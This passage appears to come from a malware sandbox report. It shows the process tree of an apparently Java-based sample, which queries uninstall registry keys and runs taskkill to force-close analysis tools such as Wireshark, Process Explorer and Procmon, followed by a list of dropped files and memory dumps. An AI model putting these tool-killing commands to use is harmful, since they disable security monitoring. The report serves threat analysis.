                                                                                                                                                                                                                                                                                                                                                                                                        reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Google Chrome" /reg:32
                                                                                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                                                                                          PID:1468
                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                        cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                          PID:320
                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                            reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}" /reg:64
                                                                                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                                                                                              PID:1332
                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                              reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}" /reg:32
                                                                                                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                PID:856
                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\System32\taskkill.exe
                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\System32\taskkill.exe" /IM "procexp.exe" /T /F
                                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                              • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                                                                                                              PID:796
                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                              cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                PID:524
                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757" /reg:64
                                                                                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                    PID:1468
                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757" /reg:32
                                                                                                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                      PID:1480
                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                    cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                      PID:1848
                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173" /reg:64
                                                                                                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                          PID:1792
                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                          reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173" /reg:32
                                                                                                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                            PID:904
                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                          cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                            PID:1480
                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860" /reg:64
                                                                                                                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                PID:1924
                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860" /reg:32
                                                                                                                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:1972
                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:796
                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655" /reg:64
                                                                                                                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:1040
                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655" /reg:32
                                                                                                                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:1792
                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:1056
                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                          reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743" /reg:64
                                                                                                                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:1800
                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                            reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743" /reg:32
                                                                                                                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:1972
                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                            cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:2000
                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063" /reg:64
                                                                                                                                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:1468
                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                  reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063" /reg:32
                                                                                                                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:1896
                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                  cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:1800
                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                      reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573" /reg:64
                                                                                                                                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:1040
                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                        reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573" /reg:32
                                                                                                                                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:2012
                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                        cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:1896
                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                            reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132}.KB4087364" /reg:64
                                                                                                                                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:1036
                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                              reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132}.KB4087364" /reg:32
                                                                                                                                                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:1468
                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                              cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:1040
                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{AC76BA86-7AD7-1033-7B44-A90000000001}" /reg:64
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:1036
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{AC76BA86-7AD7-1033-7B44-A90000000001}" /reg:32
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:1792
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:2012
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{BB8B979E-E336-47E7-96BC-1031C1B94561}" /reg:64
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:1792
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{BB8B979E-E336-47E7-96BC-1031C1B94561}" /reg:32
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:2056
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:2068
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}" /reg:64
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:2080
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}" /reg:32
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:2092
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:2104
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}" /reg:64
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:2116
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}" /reg:32
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:2128
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:2140
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}" /reg:64
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:2152
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}" /reg:32
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:2164
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\System32\taskkill.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\System32\taskkill.exe" /IM "wireshark.exe" /T /F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:2176
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\System32\taskkill.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\System32\taskkill.exe" /IM "tshark.exe" /T /F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:2224
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\System32\taskkill.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\System32\taskkill.exe" /IM "text2pcap.exe" /T /F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:2284
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\System32\taskkill.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\System32\taskkill.exe" /IM "rawshark.exe" /T /F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:2332
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\System32\taskkill.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\System32\taskkill.exe" /IM "dumpcap.exe" /T /F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:2380
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\System32\taskkill.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\System32\taskkill.exe" /IM "capinfos.exe" /T /F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:2428
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\System32\taskkill.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\System32\taskkill.exe" /IM "Procmon.exe" /T /F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:2476

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Network

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        MITRE ATT&CK Enterprise v6

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Replay Monitor

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Loading Replay Monitor...

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Downloads

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\.ntusernt.ini
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Submit

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\ujTBR\Desktop.ini
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Submit

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\ujTBR\NXtxm.class
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Submit

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • \Users\Admin\AppData\Local\Temp\hwEvRQpvbs5526845389022557616.xml
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Submit

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/108-72-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/112-200-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/112-227-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/112-86-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/112-181-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/112-215-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/296-68-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/304-47-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/308-73-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/320-234-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/320-144-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/320-245-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/368-74-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/368-29-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/484-102-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/484-151-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/524-154-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/524-193-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/524-249-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/524-232-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/524-80-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/524-104-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/524-58-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/552-4-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/552-36-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/552-92-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/568-91-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/576-50-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/588-99-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/588-53-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/608-44-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/628-94-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/628-40-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/664-113-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/664-169-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/664-45-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/680-194-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/684-2-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/740-202-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/740-166-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/752-31-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/752-182-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/752-214-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/768-163-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/768-183-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/792-100-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/792-70-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/792-32-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Download

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/796-258-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Download

